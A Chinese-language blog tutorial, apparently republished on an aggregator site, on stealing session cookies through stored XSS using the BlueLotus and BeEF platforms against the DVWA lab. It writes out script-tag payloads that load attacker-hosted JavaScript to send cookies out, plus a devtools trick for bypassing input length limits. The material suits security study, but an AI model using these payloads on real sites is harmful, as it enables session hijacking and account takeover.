利用XSS漏洞打cookie

这篇具有很好参考价值的文章主要介绍了利用XSS漏洞打cookie。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

1、为什么要打cookie?

2、怎样利用XSS来打cookie?

3、利用Bluelotus_xssReceiver平台来打cookie

4、利用beef-xss平台来打cookie


上一篇给大家介绍了xss漏洞的基础知识,在本篇章将会介绍和演示一下利用xss漏洞打cookie的演示,还不了解xss漏洞是什么的小伙伴可以先看这篇文章:

初识XSS漏洞-CSDN博客

1、为什么要打cookie?

想要回答好这个问题必须要知道cookie是用来做什么的

Cookie 是服务器保存在浏览器的一小段文本信息,一般大小不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。HTTP 协议不带有状态,有些请求需要区分状态,就通过 Cookie 附带字符串,让服务器返回不一样的回应。

举例来说,用户登录以后,服务器往往会在网站上留下一个 Cookie,记录用户编号(比如id=1234),以后每次浏览器向服务器请求数据,就会带上这个字符串,服务器从而知道是谁在请求,应该回应什么内容。

总的来说cookie就是你登录网站的凭据,有了它网站就知道是哪个用户在登录网站

2、怎样利用XSS来打cookie?

简单来说就是在你访问的页面上执行了一次JS代码,这次代码执行之后可以获取你当前已经登录某个网站的cookie,并将该cookie发送到攻击者指定的网站,攻击者拿到了你的cookie,然后就可以利用当前的cookie来登录你的网站。

3、利用Bluelotus_xssReceiver平台来打cookie

xss平台:就是攻击者用来接收cookie的平台

xss的在线攻击平台有很多,我这里演示使用的是BlueLotus_XSSReceiver 也就是“蓝莲花”

(1)安装Bluelotus_xssReceiver

直接在github/gitee上下载源码包:BlueLotus_XSSReceiver: 蓝莲花XSS平台源码 (gitee.com)

下载完成后将源码包解压,然后放到phpstudy的www目录下。

注:这里需要php环境,因此建议安装phpstudy集成环境

(2)在浏览器中访问http://127.0.0.1/BlueLotus_XSSReceiver/

然后点击安装

xss 打cookie,安全,xss,安全,web安全

然后修改配置,修改完成后点击提交

最后会显示安装成功

xss 打cookie,安全,xss,安全,web安全

(3) 构造payload

首先我们点击我的js,然后再右边填写相关的名称,选择default模板,最后点击扯生成payload

xss 打cookie,安全,xss,安全,web安全

生成的payload我们复制下来:
xss 打cookie,安全,xss,安全,web安全 

<script src="http://192.168.159.1/bluelotus/myjs/test.js"></script>

(4)测试

我们选择dvwa作为测试平台,在浏览器访问dvwa网站

将安全等级调整为low:

xss 打cookie,安全,xss,安全,web安全 然后我们选择存储型xss(xss stored),将上面生成的payload填入到Message中

xss 打cookie,安全,xss,安全,web安全

我们会发现这里我们的payload并不完整,这是因为它对长度进行了限制,我们使用开发者工具来修改长度限制:

xss 打cookie,安全,xss,安全,web安全

修改完成后我们再来提交,点击提交后,我们在蓝莲花平台中就收到了一个邮件
xss 打cookie,安全,xss,安全,web安全

点开邮件会发现这里成功的打到了cookie

xss 打cookie,安全,xss,安全,web安全

4、利用beef-xss平台来打cookie

上面我们演示了在Windows中使用“蓝莲花”在线平台打cookie,下面我们在Linux中演示一下使用beef-xss平台来打cookie

(1)首先安装xss平台

apt -y install beef-xss

注:如果安装不成功,可以尝试更新一下源

(2)可以直接在shell中输入beef-xss运行该平台

xss 打cookie,安全,xss,安全,web安全

(3)在浏览器中输入192.168.159.151:3000/ui/authentication可以访问该平台

xss 打cookie,安全,xss,安全,web安全

(4)账号和密码在/etc/beef-xss/config.yaml中可以查看

xss 打cookie,安全,xss,安全,web安全

(5)然后使用这个账号和密码进行登录

xss 打cookie,安全,xss,安全,web安全

(6)然后可以查看一下这个获取cookie的hook.js文件

xss 打cookie,安全,xss,安全,web安全

(7)还是同样的我们将这个文件作为js文件在DVWA的xss靶场中执行

<script src="//192.168.159.151:3000/hook.js">

xss 打cookie,安全,xss,安全,web安全 

(8)然后在beef平台就可以看到已经成功的获取到了我们的cookie

xss 打cookie,安全,xss,安全,web安全

到此,使用xss平台打cookie的介绍和演示就完毕了 ,更多的xss漏洞后面的篇章会进行演示文章来源地址https://www.toymoban.com/news/detail-804871.html

到了这里,关于利用XSS漏洞打cookie的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【安全测试】Web应用安全之XSS跨站脚本攻击漏洞

    目录 前言 XSS概念及分类 反射型XSS(非持久性XSS) 存储型XSS(持久型XSS) 如何测试XSS漏洞 方法一: 方法二: XSS漏洞修复 原则:不相信客户输入的数据 处理建议 资料获取方法 以前都只是在各类文档中见到过XSS,也进行过相关的学习,但是都是一知半解,过了一段时间就忘了。

    2024年02月14日
    浏览(18)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(13)
  • WEB安全之XSS漏洞与SQL注入漏洞介绍及解决方案

    这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,比较适合初学者观看。 对于防止sql注入发生,我在这里用简单拼接字符串的注入及参数化查询,如果大家对这个系列的内容感兴趣,可以在评论区告诉我! XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者

    2024年02月07日
    浏览(27)
  • Web 攻防之业务安全:Callback自定义测试(触发XSS漏洞)

    业务安全是指保护业务系统免受安全威胁的措施或手段。 广义 的业务安全应包括业务运行的 软硬件平台 (操作系统、数据库,中间件等)、 业务系统自身 (软件或设备)、 业务所提供的服务安全 ; 狭义 的业务安全指 业务系统自有的软件与服务的安全 。 Callback自定义测

    2023年04月15日
    浏览(29)
  • 常见web安全漏洞-暴力破解,xss,SQL注入,csrf

    1,暴力破解 原理:         使用大量的认证信息在认证接口进行登录认证,知道正确为止。为提高效率一般使用带有字典的工具自动化操作         基于表单的暴力破解 --- 若用户没有安全认证,直接进行抓包破解。 验证码绕过                           on s

    2023年04月12日
    浏览(26)
  • 【网络安全---XSS漏洞(1)】XSS漏洞原理,产生原因,以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 以pikachu靶场为例子进行讲解,pikachu靶场的搭建请参考以下博客; 【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程(提供靶场代码及工具)_网络安

    2024年02月08日
    浏览(19)
  • 5.1 - Web漏洞 - XSS漏洞详解

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 首先,我们通过一个案例来认识一下XSS: 1#

    2024年02月13日
    浏览(17)
  • 黑客攻击实战案例:12种开源情报收集、缓冲区溢出漏洞挖掘、路径遍历漏洞、自定义参数Cookie参数绕过2FA、二维码的XSS、恶意文件上传清单、反射型XSS漏洞、威胁情报搜索引擎

    黑客攻击实战案例:12种开源情报收集、缓冲区溢出漏洞挖掘、路径遍历漏洞、自定义参数Cookie参数绕过2FA、二维码的XSS、恶意文件上传清单、反射型XSS漏洞、威胁情报搜索引擎。 目前漏洞挖掘的常用方法只有一种就是人工分析为主,漏洞挖掘在很大程度上是个人行为,漏洞

    2024年02月04日
    浏览(26)
  • 【网络安全】Xss漏洞

    定义: XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生

    2023年04月20日
    浏览(19)
  • WEB漏洞-XSS跨站脚本漏洞解决方案参考

    WEB漏洞-XSS跨站脚本漏洞解决方案-CSDN博客 Java使用过滤器防止XSS脚本注入_防注入 参数过滤-CSDN博客

    2024年02月01日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包